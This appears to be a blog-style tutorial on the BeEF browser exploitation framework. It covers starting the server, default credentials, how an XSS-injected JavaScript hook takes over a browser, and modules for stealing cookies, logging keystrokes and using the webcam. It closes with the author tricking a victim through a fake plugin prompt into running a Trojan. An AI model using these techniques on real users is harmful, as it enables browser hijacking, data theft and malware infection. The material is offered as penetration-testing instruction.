BeEF Framework

BeEF is short for The Browser Exploitation Framework. Beef is another free great professional security tool that focuses on the web browser also an XSS exploitation tool that is designed to take over victim’s browser session as a part of the exploitation, it includes different kinds of modules and payloads. This tool will give the experience penetration tester pioneering techniques and unlike other tools, it concentrates on leveraging browser flaws to check the security posture of a target and BeEF is built only for penetration testing and legal research.

The tool is available for Windows, Linux and MAC OS X operating systems. It used for collecting the browser flaws or zombie browsers in real-time. It gives the researcher or the attacker a control and command interface which facilitates the targeting of groups or individuals of zombie browsers. It is built to make the creation of new exploit modules easy.

BeEF Usage Example

The BeEF server can be accessed via any browser on our localhost (127.0.0.1) web server at port 3000. To access its authentication page, go to:

http://localhost:3000/ui/authentication

The default credentials are “beef” for both username and password.

root@kali:~# beef-xss

[*] Please wait as BeEF services are started.

[*] You might need to refresh your browser once it opens.

BeEF JS Injection

Traditionally, the JavaScript hook is injected by the attacker into HTML code either through an attack such as Cross Site Scripting (XSS) or SQL Injection. Once the hook is processed by the browser, it beacons back home to the BeEF server, and will process JavaScript based commands sent from the BeEF server to the client.

The commands sent to the browser are triggered through modules running within the BeEF server. These modules send commands that do everything from fingerprinting browsers and plugins to allowing the attacker to proxy web traffic through the browser. Additional modules exist to perform tasks such as network scanning, browser keystroke logging, and cross protocol exploitation where HTTP requests can be sent to non-HTTP services with exploit payloads that will execute and return shells back to an attacker.

What we can do with BeEF Tool

After hooked the victim’s browser, we can use numerous built-in commands that can executed from the victim’s browser. Below are just a few examples; there are many others.

  • Get Visited Domains
  • Get Visited URLs
  • Webcam
  • Get All Cookies
  • Grab Google Contacts
  • Screenshot

In the Social Engineering below, I selected the “Fake Notification Bar (chrome)” command that very powerful to send victim Trojan that I created. As you can see, when I execute this command, an Additional plugins are required box will pop up on the screen of the user and telling, “Install Missing Plugins” If they click, it will download the Trojan user’s computer and when user run it (because user thinks its additional plugins). After user run the .exe file, Trojan will be infected computer and it will open a session in attacker computer to get in user’s computer.